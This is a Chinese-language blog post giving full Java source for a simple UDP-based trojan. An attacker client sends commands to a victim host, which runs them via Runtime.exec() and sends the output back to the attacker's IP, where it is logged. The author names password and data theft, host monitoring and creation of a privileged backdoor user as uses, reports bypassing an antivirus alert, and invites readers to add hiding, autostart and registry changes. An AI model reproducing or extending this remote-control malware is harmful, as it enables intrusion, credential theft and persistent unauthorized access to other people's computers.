Java写的一个简易木马（仅供自娱自乐）（基于UDP实现版）

闲来无事，想着利用套接字和exec()这个方法调用cmd命令并将结果通过套接字反馈到黑客电脑上，将结果写入一个文件便于以后分析。（比如窃取目标机密信息、密码、监控对方主机、查看对方CPU、内存信息，另外就是新建用户并提权便于黑客后面登陆）
开发环境：IntelljIDEA 2020+JDK1.8
Win10主机（ip:192.168.1.106）和Win7虚拟机(ip:192.168.1.107)上测试
代码如下：
黑客端：（套接字的客户端）

package UDP;
import java.io.IOException;
import java.net.DatagramPacket;
import java.net.DatagramSocket;
import java.net.InetAddress;
import java.util.Scanner;
import java.io.*;
public class hack {
    public static void main(String[] args) throws IOException {
        while(true) {
            DatagramSocket ds = new DatagramSocket();
            Scanner input=new Scanner(System.in);
            System.out.println("请输入要执行的命令");
            String str = input.nextLine();
            byte[] bytes = str.getBytes();
            InetAddress ip = InetAddress.getByName("192.168.1.107");
            DatagramPacket dp = new DatagramPacket(bytes, bytes.length, ip, 9999);
            ds.send(dp);
            byte[] bytes2=new byte[4096];
            ds.close();
            DatagramSocket ds2=new DatagramSocket(8888);
            DatagramPacket dp2=new DatagramPacket(bytes2,bytes2.length);
            ds2.receive(dp2);
            byte[] bytes3=dp2.getData();
            int leng=dp2.getLength();
            File f=new File("D:\\Trojan\\infomation\\infos");
            if(!f.exists()){
                f.createNewFile();
            }
            String info=new String(bytes3,0,leng,"gbk");
            FileWriter fw=new FileWriter(f,true);
            BufferedWriter bw=new BufferedWriter(fw);
            bw.write(info);
            bw.flush();
            bw.close();
            ds2.close();
        }
    }
}

被劫持主机（套接字服务端）：

package UDP;
import java.io.IOException;
import java.io.InputStream;
import java.net.DatagramPacket;
import java.net.DatagramSocket;
import java.net.InetAddress;
public class target {
    public static void main(String[] args) throws  IOException {
        while(true) {
            DatagramSocket ds = new DatagramSocket(9999);
            byte[] bytes = new byte[1024];
            DatagramPacket dp = new DatagramPacket(bytes, bytes.length);
            ds.receive(dp);
            byte[] bytes2 = dp.getData();
            int leng = dp.getLength();
            String command=new String(bytes2, 0, leng);
            Runtime rt=Runtime.getRuntime();
            Process pr=rt.exec(command);
            InputStream is=pr.getInputStream();
            byte[] bytes3=new byte[4096];
            while(is.read(bytes3,0,bytes3.length)!=-1){

            }
            ds.close();
            DatagramSocket ds2=new DatagramSocket();
            InetAddress ip=InetAddress.getByName("192.168.1.106");
           DatagramPacket dp2=new DatagramPacket(bytes3,bytes.length,ip,8888);
           ds2.send(dp2);
         ds2.close();
        }
    }
}

测试结果：

通过以上命令得到的数据也返回到了infos文件里面了。

更重要的，通过命令建立的hack用户并提权也成功在虚拟机上建立了。

虚拟机上的360还是比较灵的，刚输完命令运行马上报警：

点允许即可。
当然，这只是很Low很Low的一个木马，初具雏形而已。如何隐藏、定时启动、自动上传文件、修改注册表等等都未完成，感兴趣的朋友可以下去自行补充。。。。。

本文地址：https://blog.csdn.net/weixin_47034674/article/details/110205544